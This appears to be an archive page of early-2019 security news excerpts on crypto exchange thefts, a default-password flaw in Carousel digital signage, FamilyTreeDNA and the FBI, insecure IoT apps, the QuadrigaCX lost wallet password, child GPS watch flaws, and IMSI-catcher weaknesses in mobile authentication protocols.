Under the new regime, there are several options: enabling autoplay once on a website, white-listing websites to always allow autoplay from those sites, or always allow or block autoplay for all websites.


Just two hacker groups are behind 60% of stolen cryptocurrency

By Danny Bradbury

We may not know the names of those who steal cryptocurrency from online exchanges, but we now know that most of the thefts are down to just two groups – and one of them isn’t even in it for the money alone.

A new report from blockchain investigation company Chainalysis reveals that just two criminal groups are responsible for around 60% of all cryptocurrency stolen from exchanges.

Cryptocurrency exchanges are prime targets for cybercriminals. People trading Bitcoin and other virtual currencies do so using exchanges, and many tend to leave their funds in their accounts on those exchanges rather than withdrawing them to a secure account under their control. This makes it more convenient for them to to make trades quickly without having to keep redepositing funds.

Large amounts of these funds often reside in an exchange’s hot wallet, which is connected to the blockchain and therefore online. It makes exchanges prime targets for online attacks. Chainalysis, which uses forensic techniques to find connections between cryptocurrency addresses, analysed some of those thefts to find out where the funds ended up. They may not know who owns the addresses, but using its forensic techniques it can determine whether the addresses are owned by the same people.

In its Crypto Crime Report, released last week, Chainalysis found that two groups, which it calls Alpha and Beta, were responsible for stealing around $1 billion in funds from exchanges.


Digital signs left wide open with default password

By Lisa Vaas

Security researcher Drew Green has pried open an internet-connected digital signage system thanks to a default admin web interface password: an easily changeable password that allowed him into the web interface, from where he stumbled onto a chain of vulnerabilities that could allow a malicious attacker to upload whatever unsavories they’d like to display on people’s signage screens.

On Friday, 90 days after Green says he disclosed the vulnerabilities to the digital signage system maker, he published the specifics.

He had pulled apart the signage system for a client during a full-scope penetration test, and this system happened to be on the network. He couldn’t find anything else to dig into, so Green sunk his hooks into the signage system, named Carousel, which comes from Tightrope Media Systems (TRMS) and which his client was running on a TRMS-supplied device that Green says is “essentially an x86 Windows 10 PC.”

As Green understands it, his client had a television in the lobby that was hooked up to the system in order to display information about the company: for example, when interns graduated college; names and pictures of new hires; and awards the company had received. The systems can also play audio, videos, or images: a good way to give customers their first impression when they’re visiting your company.

Or, on the other hand, a good way to sear visitors’ eyeballs if a hacker figures out how to upload whatever unsavories they like.


February 5, 2019 »

Home DNA kit company says it’s working with the FBI

By Lisa Vaas

FamilyTreeDNA – one of the larger makers of at-home genealogy test kits – has disclosed that it’s quietly been giving the FBI access to its database of 1 million DNA profiles to help solve violent crime.

Investigators’ use of public genealogy databases is nothing new: law enforcement agencies have been using them for years. But the power of online genealogy databases to help track down and identify people became clear in April 2018, when police arrested Joseph James DeAngelo on suspicion of being the Golden State Killer: the man allegedly responsible for more than 50 rapes, 12 murders and more than 120 burglaries across the state of California during the 70s and 80s.

What’s new about FamilyTreeDNA’s cooperation with the FBI – as reported by BuzzFeed News on Thursday – is that it’s the first time that a private genealogy company has publicly admitted to voluntarily letting a law enforcement agency access its database.

A spokesperson for FamilyTreeDNA told BuzzFeed that the company hasn’t signed a contract with the FBI. But it has agreed to use its private lab to test DNA samples at the bureau’s request, and to upload the profiles to its database, on a case-by-case basis. It’s been doing so since this past autumn, according to BuzzFeed.

The spokesperson said that working with the FBI is “a very new development” that started with one case last year and “morphed.” At this point, she said, the company has cooperated with the FBI on fewer than 10 cases.


Half of IoT devices let down by vulnerable apps

By John E Dunn

Testing Internet of Things (IoT) devices for security weaknesses can often resemble a large fist punching a wet paper bag. Researchers report a litany of firmware vulnerabilities, insecure wireless communications, and consumer complacency about the risks of connecting smart devices to a home network.

With so much bad press, might things be improving?

Not as fast as they should be, according to a test by researchers from Brazil’s Federal University of Pernambuco and the University of Michigan, who took a closer look at 32 smartphone apps used to configure and control the 96 top-selling Wi-Fi and Bluetooth-enabled devices sold on Amazon.

There’s a lot for IoT makers to secure, including the apps themselves, their connection to cloud proxies (typically used during initial setup), and the subsequent wireless connection and authentication to and from the IoT device.

It’s also a lot of equipment to test, which is why the researchers in this study started by inferring potential weaknesses using heuristic analysis of the apps themselves.

Disappointingly, 31% of the apps (corresponding to 37 devices out of 96) had no encryption at all while another 19% had hard-coded encryption keys an attacker might be able to reverse engineer even if they’d been obfuscated.


Crypto exchange in limbo after founder dies with password

By Danny Bradbury

Customers of Canadian cryptocurrency exchange QuadrigaCX are missing over $250 million CAD in fiat and virtual currency (a total of around $190m in US dollars) after its founder died without telling anyone the password for his storage wallet.

QuadrigaCX enabled users to trade between fiat currency and cryptocurrencies including Bitcoin, Bitcoin Cash, Litecoin and Ethereum.

Gerry Cotten, the 30-year-old founder of the Vancouver-based exchange, passed away in India on 9 December 2018 due to complications from Crohn’s disease. In an affidavit to the Supreme Court of Nova Scotia, his partner Jennifer Robertson explained that cryptocurrencies had been stored in a cold wallet under his sole control.

In cryptocurrency trading, a wallet is a repository for cryptocurrency addresses that contain assets, along with private keys to access them. There are two kinds of wallet: hot, and cold.

A hot wallet is a software program connected to a blockchain, enabling it to make cryptocurrency transactions. A hot wallet can be vulnerable to hacking via software compromise.

A cold wallet stores address and private key details off the blockchain. It can take several forms. A paper wallet stores the details in writing, while a hardware wallet stores addresses and keys in a device. A cold storage wallet could even be a simple text file containing the appropriate addresses and keys. It can still be physically stolen, but because it isn’t connected to a blockchain it isn’t vulnerable to online compromise.


Kids’ GPS watches are still a security ‘train wreck’

By Lisa Vaas

A year after Norwegian researchers found that child-tracking, GPS-connected smartwatches had major security flaws – flaws that would have let strangers eavesdrop on a child, talk to them behind their parent’s back, use the watch’s camera to take their picture, stalk them, or lie about their whereabouts – not much has changed.

When Pen Test Partners decided to check up on how one of the four models the Norwegian researchers looked at had shaped up over the course of 14 months, things turned out to be status quo: the security of TechSixtyFour’s Gator watch and thousands of other watches was still a train wreck.

Pen Test Partners’ TL;DR:

Guess what: a train wreck. Anyone could access the entire database, including real time child location, name, parents details etc. Not just Gator watches either – the same back end covered multiple brands and tens of thousands of watches

Following the Norwegian Consumer Council’s (NCC’s) 2017 report about these Internet-of-Things (IoT) wrist wraps, bad press broke out like so much prepubescent acne. At least one UK retailer, John Lewis, responded by yanking the Gator 2.

In November 2018, TechSixtyFour founder Colleen Wong said on the company’s blog that it had responded to the NCC’s report with a complete, one-month-long system overhaul. It also hired a vulnerability assessment firm to review its systems on an ongoing, monthly basis.


Security weaknesses in 5G, 4G and 3G could expose users’ locations

By John E Dunn

Fifth generation (5G) wireless test networks are barely in the ground and already researchers say they’ve uncovered new weaknesses in the protocol meant to secure it.

5G security is built around 5G AKA (Authentication and Key Agreement), an enhanced version of the AKA protocol already used by 3G and 4G networks.

A big issue this was supposed to address was the ease with which surveillance of 3G and 4G devices can be carried out using fake base stations known as IMSI catchers (International Mobile Subscriber Identity-catcher, sometimes called ‘StingRays’).

Disappointingly, according to a research paper, New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols, made public late last year, 5G AKA might not solve this thanks to deeper issues with the AKA protocol on which it is based.

As the name suggests, IMSI catchers work by tricking devices into connecting to them instead of the real base station, exploiting the fact that under GSM (the Global System for Mobile Communication mobile phone standard), devices prioritize closer and stronger signals.

Luring a smartphone to connect to a fake base gives attackers the power to identify the device’s owner, track their physical location, and potentially execute a downgrade attack by asking it to remove security such as encryption.


« older